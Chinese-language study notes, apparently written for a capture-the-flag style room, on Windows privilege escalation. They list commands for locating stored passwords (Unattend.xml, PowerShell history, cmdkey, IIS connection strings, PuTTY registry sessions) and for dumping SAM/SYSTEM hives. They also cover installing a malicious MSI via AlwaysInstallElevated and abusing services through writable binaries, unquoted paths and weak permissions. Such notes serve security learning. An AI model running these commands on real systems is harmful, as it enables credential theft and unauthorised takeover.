Room Link

resmon.exe     -  资源监视器
msinfo32.exe   - 打开系统信息
compmgmt.msc   - 计算机管理
UserAccountControlSettings.exe   - 用户账户控制设置
control.exe    - 控制面板
regedt32.exe   - 注册表编辑器
takeown.exe    - 获取文件或目录的所有权
accesschk.exe  - 检查DACL

windows 查找可能存在的密码

配置文件
    C:\Unattend.xml
    C:\Windows\Panther\Unattend.xml
    C:\Windows\Panther\Unattend\Unattend.xml
    C:\Windows\system32\sysprep.inf
    C:\Windows\system32\sysprep\sysprep.xml
powershell 历史命令
    %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
    $env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
凭据管理器
    cmdkey /list
IIS 配置文件(IIS Configuration)
    type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
runas 利用已保存的密码
    runas /savecred /user:admin cmd.exe
Putty 保存密码到注册表
    reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

提权-初级
计划任务(Scheduled Task)

schtasks.exe /query /tn vulntask /fo list /v   => 关注 Task To Run: (运行的程序位置)
icacls.exe file_path  => 查看文件的权限
schtasks.exe /run /tn vulntask    => 重启服务

-----------------------------
AlwaysInstallElevated 策略: 允许 MSI(Microsoft Installer)安装包在提升的权限下安装,即使用户没有管理员权限。
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
利用: msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

滥用服务错误配置

  1. 服务可执行文件可被修改
    sc qc ServerName => 关注 BINARY_PATH_NAMESERVICE_START_NAME=> 如果文件可以被修改,覆盖,然后重启服务=>sc stop ServerName,sc start ServerName
  2. 未加引号的服务路径
    比较两个服务的BINARY_PATH_NAME
    a. BINARY_PATH_NAME : "C:\Program Files\RealVNC\VNC Server\vncserver.exe" -service
    b. BINARY_PATH_NAME : C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
    a的路径是被双引号包裹,b没有,解析顺序依次如下
命令参数1参数2
C:\MyPrograms\Disk.exeSorterEnterprise\bin\disksrs.exe
C:\MyPrograms\Disk Sorter.exeEnterprise\bin\disksrs.exe
C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe

这与命令提示符分析命令的方式有关。通常,当您发送命令时,空格用作参数分隔符,除非它们是带引号的字符串的一部分。
因此可以在C:\MyPrograms\ 目录下创建可执行文件Disk.exe => 重启服务
(需要授予其全部权限icacls C:\MyPrograms\Disk.exe /grant Everyone:F)

  1. 不安全的服务权限
    Sysinternals suite 工具Accesschk,用于检查服务的DACL(Discretionary Access Control List,即任意访问控制列表)
    accesschk64.exe -qlc ServiceName
Windows 权限列表: https://github.com/gtworek/Priv2Admin
SeBackup / SeRestore : 备份 hklm\system 和hklm\sam ( reg save hklm\system file.hive)
SeTakeOwnership : takeown.exe /f => icacls =>替换文件
SeImpersonate / SeAssignPrimaryToken: => RogueWinRM提权

已安装的软件信息 wmic product get name,version,vendor

自动化工具:
winpeas: https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS
PrivescCheck : https://github.com/itm4n/PrivescCheck
wesng: https://github.com/bitsadmin/wesng
msf: multi/recon/local_exploit_suggester
其他资源:

Last modification:July 25, 2024
© Allow specification reprint
请我喝瓶冰阔落吧